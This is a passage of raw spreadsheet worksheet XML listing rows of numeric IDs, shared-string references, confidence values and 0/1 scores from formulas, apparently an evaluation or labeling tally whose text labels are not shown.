        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O728" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="62">
        <v>1722.0</v>
      </c>
      <c r="B729" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C729" s="63" t="s">
        <v>2377</v>
      </c>
      <c r="D729" s="62" t="s">
        <v>2378</v>
      </c>
      <c r="E729" s="62" t="s">
        <v>2379</v>
      </c>
      <c r="F729" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G729" s="62">
        <v>0.95</v>
      </c>
      <c r="H729" s="64">
        <v>1.0</v>
      </c>
      <c r="I729" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J729" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K729" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L729" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O729" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="62">
        <v>1724.0</v>
      </c>
      <c r="B730" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C730" s="63" t="s">
        <v>2380</v>
      </c>
      <c r="D730" s="62" t="s">
        <v>2381</v>
      </c>
      <c r="E730" s="62" t="s">
        <v>2382</v>
      </c>
      <c r="F730" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G730" s="62">
        <v>0.9</v>
      </c>
      <c r="H730" s="64">
        <v>0.0</v>
      </c>
      <c r="I730" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J730" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K730" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L730" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O730" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="62">
        <v>1776.0</v>
      </c>
      <c r="B731" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C731" s="63" t="s">
        <v>2383</v>
      </c>
      <c r="D731" s="62" t="s">
        <v>2384</v>
      </c>
      <c r="E731" s="62" t="s">
        <v>2385</v>
      </c>
      <c r="F731" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G731" s="62">
        <v>0.95</v>
      </c>
      <c r="H731" s="64">
        <v>1.0</v>
      </c>
      <c r="I731" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J731" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K731" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L731" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O731" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="62">
        <v>1808.0</v>
      </c>
      <c r="B732" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C732" s="63" t="s">
        <v>2386</v>
      </c>
      <c r="D732" s="62" t="s">
        <v>2387</v>
      </c>
      <c r="E732" s="62" t="s">
        <v>2388</v>
      </c>
      <c r="F732" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G732" s="62">
        <v>0.9</v>
      </c>
      <c r="H732" s="64">
        <v>1.0</v>
      </c>
      <c r="I732" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J732" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K732" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L732" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O732" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="62">
        <v>1838.0</v>
      </c>
      <c r="B733" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C733" s="63" t="s">
        <v>2389</v>
      </c>
      <c r="D733" s="62" t="s">
        <v>2390</v>
      </c>
      <c r="E733" s="62" t="s">
        <v>2391</v>
      </c>
      <c r="F733" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G733" s="62">
        <v>0.9</v>
      </c>
      <c r="H733" s="64">
        <v>1.0</v>
      </c>
      <c r="I733" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J733" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K733" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L733" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O733" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="62">
        <v>1884.0</v>
      </c>
      <c r="B734" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C734" s="63" t="s">
        <v>2392</v>
      </c>
      <c r="D734" s="62" t="s">
        <v>2393</v>
      </c>
      <c r="E734" s="62" t="s">
        <v>2394</v>
      </c>
      <c r="F734" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G734" s="62">
        <v>0.9</v>
      </c>
      <c r="H734" s="64">
        <v>1.0</v>
      </c>
      <c r="I734" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J734" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K734" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L734" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O734" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="62">
        <v>1917.0</v>
      </c>
      <c r="B735" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C735" s="63" t="s">
        <v>2395</v>
      </c>
      <c r="D735" s="62" t="s">
        <v>2396</v>
      </c>
      <c r="E735" s="62" t="s">
        <v>2397</v>
      </c>
      <c r="F735" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G735" s="62">
        <v>0.9</v>
      </c>
      <c r="H735" s="64">
        <v>1.0</v>
      </c>
      <c r="I735" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J735" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K735" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L735" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O735" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="62">
        <v>1988.0</v>
      </c>
      <c r="B736" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C736" s="63" t="s">
        <v>2398</v>
      </c>
      <c r="D736" s="62" t="s">
        <v>2399</v>
      </c>
      <c r="E736" s="62" t="s">
        <v>2400</v>
      </c>
      <c r="F736" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G736" s="62">
        <v>0.9</v>
      </c>
      <c r="H736" s="64">
        <v>0.0</v>
      </c>
      <c r="I736" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J736" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K736" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L736" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O736" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="62">
        <v>1999.0</v>
      </c>
      <c r="B737" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C737" s="63" t="s">
        <v>2401</v>
      </c>
      <c r="D737" s="62" t="s">
        <v>2402</v>
      </c>
      <c r="E737" s="62" t="s">
        <v>2403</v>
      </c>
      <c r="F737" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G737" s="62">
        <v>0.8</v>
      </c>
      <c r="H737" s="64" t="s">
        <v>135</v>
      </c>
      <c r="I737" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J737" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K737" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L737" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M737" s="62" t="s">
        <v>2404</v>
      </c>
      <c r="N737" s="62" t="s">
        <v>2405</v>
      </c>
      <c r="O737" s="62">
        <v>0.0</v>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="62">
        <v>2039.0</v>
      </c>
      <c r="B738" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C738" s="63" t="s">
        <v>2406</v>
      </c>
      <c r="D738" s="62" t="s">
        <v>2407</v>
      </c>
      <c r="E738" s="62" t="s">
        <v>2408</v>
      </c>
      <c r="F738" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G738" s="62">
        <v>0.95</v>
      </c>
      <c r="H738" s="64">
        <v>1.0</v>
      </c>
      <c r="I738" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J738" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K738" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L738" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O738" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="62">
        <v>2065.0</v>
      </c>
      <c r="B739" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C739" s="63" t="s">
        <v>2409</v>
      </c>
      <c r="D739" s="62" t="s">
        <v>2410</v>
      </c>
      <c r="E739" s="62" t="s">
        <v>2411</v>
      </c>
      <c r="F739" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G739" s="62">
        <v>0.9</v>
      </c>
      <c r="H739" s="64">
        <v>0.0</v>
      </c>
      <c r="I739" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J739" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K739" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L739" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O739" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="62">
        <v>2125.0</v>
      </c>
      <c r="B740" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C740" s="63" t="s">
        <v>2412</v>
      </c>
      <c r="D740" s="62" t="s">
        <v>2413</v>
      </c>
      <c r="E740" s="62" t="s">
        <v>2414</v>
      </c>
      <c r="F740" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G740" s="62">
        <v>0.9</v>
      </c>
      <c r="H740" s="64">
        <v>1.0</v>
      </c>
      <c r="I740" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J740" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K740" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L740" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O740" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="62">
        <v>2177.0</v>
      </c>
      <c r="B741" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C741" s="63" t="s">
        <v>2415</v>
      </c>
      <c r="D741" s="62" t="s">
        <v>2416</v>
      </c>
      <c r="E741" s="62" t="s">
        <v>2417</v>
      </c>
      <c r="F741" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G741" s="62">
        <v>0.9</v>
      </c>
      <c r="H741" s="64">
        <v>0.0</v>
      </c>
      <c r="I741" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J741" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K741" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L741" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O741" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="62">
        <v>2371.0</v>
      </c>
      <c r="B742" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C742" s="63" t="s">
        <v>2418</v>
      </c>
      <c r="D742" s="62" t="s">
        <v>2419</v>
      </c>
      <c r="E742" s="62" t="s">
        <v>2420</v>
      </c>
      <c r="F742" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G742" s="62">
        <v>0.95</v>
      </c>
      <c r="H742" s="64">
        <v>1.0</v>
      </c>
      <c r="I742" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J742" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K742" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L742" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O742" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="62">
        <v>2387.0</v>
      </c>
      <c r="B743" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C743" s="63" t="s">
        <v>2421</v>
      </c>
      <c r="D743" s="62" t="s">
        <v>2422</v>
      </c>
      <c r="E743" s="62" t="s">
        <v>2423</v>
      </c>
      <c r="F743" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G743" s="62">
        <v>0.9</v>
      </c>
      <c r="H743" s="64" t="s">
        <v>2424</v>
      </c>
      <c r="I743" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J743" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K743" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L743" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O743" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="62">
        <v>2389.0</v>
      </c>
      <c r="B744" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C744" s="63" t="s">
        <v>2425</v>
      </c>
      <c r="D744" s="62" t="s">
        <v>2426</v>
      </c>
      <c r="E744" s="62" t="s">
        <v>2427</v>
      </c>
      <c r="F744" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G744" s="62">
        <v>0.95</v>
      </c>
      <c r="H744" s="64" t="s">
        <v>2424</v>
      </c>
      <c r="I744" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J744" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K744" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L744" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O744" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="62">
        <v>2417.0</v>
      </c>
      <c r="B745" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C745" s="63" t="s">
        <v>2428</v>
      </c>
      <c r="D745" s="62" t="s">
        <v>2429</v>
      </c>
      <c r="E745" s="62" t="s">
        <v>2430</v>
      </c>
      <c r="F745" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G745" s="62">
        <v>0.9</v>
      </c>
      <c r="H745" s="64">
        <v>0.0</v>
      </c>
      <c r="I745" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J745" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K745" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L745" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O745" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="62">
        <v>2434.0</v>
      </c>
      <c r="B746" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C746" s="63" t="s">
        <v>2431</v>
      </c>
      <c r="D746" s="62" t="s">
        <v>2432</v>
      </c>
      <c r="E746" s="62" t="s">
        <v>2433</v>
      </c>
      <c r="F746" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G746" s="62">
        <v>0.9</v>
      </c>
      <c r="H746" s="64">
        <v>1.0</v>
      </c>
      <c r="I746" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J746" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K746" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L746" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O746" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="62">
        <v>2583.0</v>
      </c>
      <c r="B747" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C747" s="63" t="s">
        <v>2434</v>
      </c>
      <c r="D747" s="62" t="s">
        <v>2435</v>
      </c>
      <c r="E747" s="62" t="s">
        <v>2436</v>
      </c>
      <c r="F747" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G747" s="62">
        <v>0.85</v>
      </c>
      <c r="H747" s="64">
        <v>1.0</v>
      </c>
      <c r="I747" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J747" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K747" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L747" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O747" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="62">
        <v>2593.0</v>
      </c>
      <c r="B748" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C748" s="63" t="s">
        <v>2437</v>
      </c>
      <c r="D748" s="62" t="s">
        <v>2438</v>
      </c>
      <c r="E748" s="62" t="s">
        <v>2439</v>
      </c>
      <c r="F748" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G748" s="62">
        <v>0.9</v>
      </c>
      <c r="H748" s="64">
        <v>1.0</v>
      </c>
      <c r="I748" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J748" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K748" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L748" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O748" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="62">
        <v>2648.0</v>
      </c>
      <c r="B749" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C749" s="63" t="s">
        <v>2440</v>
      </c>
      <c r="D749" s="62" t="s">
        <v>2441</v>
      </c>
      <c r="E749" s="62" t="s">
        <v>2442</v>
      </c>
      <c r="F749" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G749" s="62">
        <v>0.9</v>
      </c>
      <c r="H749" s="64">
        <v>1.0</v>
      </c>
      <c r="I749" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J749" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K749" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L749" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O749" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="62">
        <v>3467.0</v>
      </c>
      <c r="B750" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C750" s="63" t="s">
        <v>2443</v>
      </c>
      <c r="D750" s="62" t="s">
        <v>2444</v>
      </c>
      <c r="E750" s="62" t="s">
        <v>2445</v>
      </c>
      <c r="F750" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G750" s="62">
        <v>0.95</v>
      </c>
      <c r="H750" s="64">
        <v>1.0</v>
      </c>
      <c r="I750" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J750" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K750" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L750" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O750" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="62">
        <v>3476.0</v>
      </c>
      <c r="B751" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C751" s="63" t="s">
        <v>2446</v>
      </c>
      <c r="D751" s="62" t="s">
        <v>2447</v>
      </c>
      <c r="E751" s="62" t="s">
        <v>2448</v>
      </c>
      <c r="F751" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G751" s="62">
        <v>0.95</v>
      </c>
      <c r="H751" s="64">
        <v>1.0</v>
      </c>
      <c r="I751" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J751" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K751" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L751" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O751" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="62">
        <v>4088.0</v>
      </c>
      <c r="B752" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C752" s="63" t="s">
        <v>2449</v>
      </c>
      <c r="D752" s="62" t="s">
        <v>2450</v>
      </c>
      <c r="E752" s="62" t="s">
        <v>2451</v>
      </c>
      <c r="F752" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G752" s="62">
        <v>0.9</v>
      </c>
      <c r="H752" s="64">
        <v>1.0</v>
      </c>
      <c r="I752" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J752" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K752" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L752" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O752" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="62">
        <v>4143.0</v>
      </c>
      <c r="B753" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C753" s="63" t="s">
        <v>2452</v>
      </c>
      <c r="D753" s="62" t="s">
        <v>2453</v>
      </c>
      <c r="E753" s="62" t="s">
        <v>2454</v>
      </c>
      <c r="F753" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G753" s="62">
        <v>0.85</v>
      </c>
      <c r="H753" s="64">
        <v>0.0</v>
      </c>
      <c r="I753" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J753" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K753" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L753" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O753" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="62">
        <v>4270.0</v>
      </c>
      <c r="B754" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C754" s="63" t="s">
        <v>2455</v>
      </c>
      <c r="D754" s="62" t="s">
        <v>2456</v>
      </c>
      <c r="E754" s="62" t="s">
        <v>2457</v>
      </c>
      <c r="F754" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G754" s="62">
        <v>0.95</v>
      </c>
      <c r="H754" s="64">
        <v>1.0</v>
      </c>
      <c r="I754" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J754" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K754" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L754" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O754" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="62">
        <v>4305.0</v>
      </c>
      <c r="B755" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C755" s="63" t="s">
        <v>2458</v>
      </c>
      <c r="D755" s="62" t="s">
        <v>2459</v>
      </c>
      <c r="E755" s="62" t="s">
        <v>2460</v>
      </c>
      <c r="F755" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G755" s="62">
        <v>0.9</v>
      </c>
      <c r="H755" s="64">
        <v>0.0</v>
      </c>
      <c r="I755" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J755" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K755" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L755" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O755" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="62">
        <v>4467.0</v>
      </c>
      <c r="B756" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C756" s="63" t="s">
        <v>2461</v>
      </c>
      <c r="D756" s="62" t="s">
        <v>2462</v>
      </c>
      <c r="E756" s="62" t="s">
        <v>2463</v>
      </c>
      <c r="F756" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G756" s="62">
        <v>0.95</v>
      </c>
      <c r="H756" s="64">
        <v>0.0</v>
      </c>
      <c r="I756" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J756" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K756" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L756" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O756" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="62">
        <v>4934.0</v>
      </c>
      <c r="B757" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C757" s="63" t="s">
        <v>2464</v>
      </c>
      <c r="D757" s="62" t="s">
        <v>2465</v>
      </c>
      <c r="E757" s="62" t="s">
        <v>2466</v>
      </c>
      <c r="F757" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G757" s="62">
        <v>0.9</v>
      </c>
      <c r="H757" s="64">
        <v>0.0</v>
      </c>
      <c r="I757" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J757" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K757" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L757" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O757" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="62">
        <v>4967.0</v>
      </c>
      <c r="B758" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C758" s="63" t="s">
        <v>2467</v>
      </c>
      <c r="D758" s="62" t="s">
        <v>2468</v>
      </c>
      <c r="E758" s="62" t="s">
        <v>2469</v>
      </c>
      <c r="F758" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G758" s="62">
        <v>0.9</v>
      </c>
      <c r="H758" s="64">
        <v>0.0</v>
      </c>
      <c r="I758" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J758" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K758" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L758" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O758" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="62">
        <v>5155.0</v>
      </c>
      <c r="B759" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C759" s="63" t="s">
        <v>2470</v>
      </c>
      <c r="D759" s="62" t="s">
        <v>2471</v>
      </c>
      <c r="E759" s="62" t="s">
        <v>2472</v>
      </c>
      <c r="F759" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G759" s="62">
        <v>0.95</v>
      </c>
      <c r="H759" s="64">
        <v>1.0</v>
      </c>
      <c r="I759" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J759" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K759" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L759" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O759" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="62">
        <v>5213.0</v>
      </c>
      <c r="B760" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C760" s="63" t="s">
        <v>2473</v>
      </c>
      <c r="D760" s="62" t="s">
        <v>2474</v>
      </c>
      <c r="E760" s="62" t="s">
        <v>2475</v>
      </c>
      <c r="F760" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G760" s="62">
        <v>0.9</v>
      </c>
      <c r="H760" s="64">
        <v>1.0</v>
      </c>
      <c r="I760" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J760" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K760" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L760" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O760" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="62">
        <v>5774.0</v>
      </c>
      <c r="B761" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C761" s="63" t="s">
        <v>2476</v>
      </c>
      <c r="D761" s="62" t="s">
        <v>2477</v>
      </c>
      <c r="E761" s="62" t="s">
        <v>2478</v>
      </c>
      <c r="F761" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G761" s="62">
        <v>0.9</v>
      </c>
      <c r="H761" s="64">
        <v>0.0</v>
      </c>
      <c r="I761" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J761" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K761" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L761" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O761" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="62">
        <v>5864.0</v>
      </c>
      <c r="B762" s="62" t="s">
        <v>88</v>
      </c>
      <c r="C762" s="63" t="s">
        <v>2479</v>
      </c>
      <c r="D762" s="62" t="s">
        <v>2480</v>
      </c>
      <c r="E762" s="62" t="s">
        <v>2481</v>
      </c>
